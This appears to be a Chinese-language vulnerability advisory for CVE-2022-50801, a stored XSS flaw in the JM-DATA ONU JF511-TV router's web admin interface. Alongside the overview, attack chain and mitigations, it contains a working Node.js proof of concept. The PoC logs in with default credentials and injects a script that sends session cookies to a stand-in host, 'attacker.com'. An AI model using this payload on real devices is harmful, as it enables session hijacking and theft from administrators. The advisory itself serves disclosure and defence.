CVE-2022-50801 JM-DATA ONU JF511-TV 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2022-50801

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

JM-DATA ONU JF511-TV

漏洞概述

CVE-2022-50801是JM-DATA公司生产的ONU JF511-TV设备中存在的一个经过认证的存储型跨站脚本(XSS)漏洞。该漏洞影响版本1.0.67，CVSS评分为4.3（中危）。攻击者通过获取设备低权限认证后，可以在设备的Web管理界面中注入恶意JavaScript脚本。由于该XSS为存储型，恶意脚本会被永久保存在设备系统中，当其他具有不同权限的用户访问受影响的管理页面或查看相关数据时，嵌入的恶意代码会在受害者浏览器中执行。这可能导致会话劫持、敏感信息窃取、凭据钓鱼攻击，甚至在某些情况下通过XSS进一步提升权限或执行其他恶意操作。由于该设备通常部署在运营商网络侧，漏洞的利用可能影响到大量终端用户的通信安全。

技术细节

该漏洞属于存储型（Stored XSS）跨站脚本漏洞，存在于JM-DATA ONU JF511-TV的Web管理界面中。漏洞的根本原因在于应用程序未能对用户输入进行充分的输入验证和输出编码。攻击者以低权限账户（PR:L）登录设备管理后台后，可以向特定功能模块（如设备名称、描述字段、配置参数等）注入包含JavaScript代码的恶意payload。由于应用程序在后续页面渲染时直接将用户提交的数据回显到HTML中而未进行适当的转义处理，注入的脚本会被浏览器作为合法代码执行。存储型XSS的特点是恶意payload永久存储在服务器端，只要数据不被清除，任何访问该数据的用户都会触发攻击。攻击者常利用此漏洞窃取用户会话cookie、伪造表单提交或进行钓鱼攻击。由于ONU设备通常由服务提供商统一管理，攻击者可能通过此漏洞横向移动或收集网络敏感信息。

攻击链分析

STEP 1

步骤1

攻击者获取JM-DATA ONU JF511-TV设备的低权限账户凭据

STEP 2

步骤2

使用认证账户登录设备Web管理界面

STEP 3

步骤3

在存在漏洞的输入字段中注入恶意JavaScript脚本（如设备名称、描述等参数）

STEP 4

步骤4

恶意payload被存储到设备数据库中，等待其他用户访问触发

STEP 5

步骤5

当其他用户（如管理员）访问受影响页面时，XSS payload在其浏览器中执行

STEP 6

步骤6

攻击者通过JavaScript窃取用户会话cookie、窃取敏感信息或进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2022-50801 PoC - Stored XSS in JM-DATA ONU JF511-TV
// Authenticated Stored XSS Payload

const axios = require('axios');

// Configuration
const TARGET = 'http://192.168.1.1'; // Device IP
const USERNAME = 'admin';
const PASSWORD = 'admin';

// XSS Payload - Steal session cookies
const xssPayload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>';

// Login and exploit
async function exploit() {
  try {
    // Step 1: Login to get authenticated session
    const loginResp = await axios.post(`${TARGET}/login`, {
      username: USERNAME,
      password: PASSWORD
    });
    const cookies = loginResp.headers['set-cookie'];
    
    // Step 2: Inject XSS payload into vulnerable parameter
    // Common vulnerable fields: device_name, description, custom_dns, etc.
    await axios.post(`${TARGET}/api/device/config`, {
      device_name: xssPayload,
      description: 'JM-DATA ONU JF511-TV',
      version: '1.0.67'
    }, {
      headers: { Cookie: cookies }
    });
    
    console.log('[+] XSS payload injected successfully');
    console.log('[+] Payload will execute when admin views device info');
  } catch (err) {
    console.error('[-] Exploitation failed:', err.message);
  }
}

exploit();

影响范围

JM-DATA ONU JF511-TV < 1.0.67

JM-DATA ONU JF511-TV version 1.0.67

防御指南

临时缓解措施

在厂商发布修复补丁前，可采取以下临时缓解措施：1）限制设备Web管理界面的访问来源，仅允许受信任的网络段访问；2）使用强密码策略并定期更换设备管理凭据；3）部署Web应用防火墙（WAF）过滤恶意请求；4）监控管理界面访问日志，及时发现异常行为；5）考虑使用VPN或专用网络通道访问设备管理后台；6）如果业务允许，暂时禁用设备远程管理功能。